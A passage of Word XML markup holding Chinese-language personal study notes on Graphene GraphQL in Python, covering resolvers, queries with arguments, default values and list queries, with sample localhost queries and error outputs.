        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_person(root, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD8332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return data[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188EEC3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E096FD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>schema = Schema(query=Query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13A3B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7C171F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>query = '{person{firstName lastName}}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FB4DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这里看，和程序里对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> first_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> last_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是不一样的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A4964" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这里的下划线加字母，要变成函数的驼峰命名法来进行查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E69A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>result = schema.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A71955" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>执行查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83B589" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D81294" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114D6806" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619C60C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先进行如下的修改：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738BD41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>person = Field(PersonType, key=Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C14B17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206AA173" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>def resolve_person(root, info, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0886D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    return data[key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E9AA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以是任意的名字，可以改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> id ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC00FCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>person = Field(PersonType, id=Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552AED1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD72981" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>def resolve_person(root, info, id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B602E00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Person.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>query.get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1A4D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>但是经过实验，这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>其实没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"> query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>这个方法的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CACD890" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFD0912" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用如下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行查询：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F51BBA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http://127.0.0.1:5000/graphql?query=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>{person(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>:2){firstName lastName age}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D98AD6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码中要求传参的话，再直接进行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15419ABF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>query = '{person{firstName lastName}}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:br/>
        <w:t>result = schema.execute(query)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:br/>
        <w:t>print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA3FC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的查询会直接报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD2CC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{'errors': [{'message': "resolve_person() missing 1 required positional argument: 'key'", 'locations': </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[{'line': 1, 'column': 2}], 'path': ['person']}], 'data': {'person': None}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3AA6D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参的缺省值查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1EEE20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>person = Field(PersonType, id=Int(default_value=1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A23D08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720C3C09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000/graphql?query={person{firstName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A682732" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B481CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE4911A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9F8769" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391A8F73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE137B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103E3452" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class Query(ObjectType):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69F113" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    person = Field(PersonType, key=Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24524417" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>people = List(PersonType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AE633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def resolve_person(root, info, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DDCB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return data[key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E791612" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>def resolve_people(root, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650AD39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        return data.values()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601220C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32802732" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C65C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E898179" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>query = '{people}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38D44E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print("[#] Q: ", query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B35638A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>result = schema.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A388F9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print("[#] R: ", result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA0B7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC7C6FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A29355F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{'errors': [{'message': 'Field "people" of type "[PersonType]" must have a sub selection.', 'locations': [{'line': 1, 'column': 2}]}]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F13B1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66753A1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里必须放置个子查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43A3C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE23EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>query = '{people{age}}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE4AB0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print("[#] Q: ", query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48836399" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>result = schema.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390B5E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print("[#] R: ", result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E55A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0248A424" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD9C98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{'data': {'people': [{'age': 56}, {'age': 63}, {'age': 76}, {'age': 63}]}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD50CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4211DAA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FE477B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53091B77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6F7FA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1380A780" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
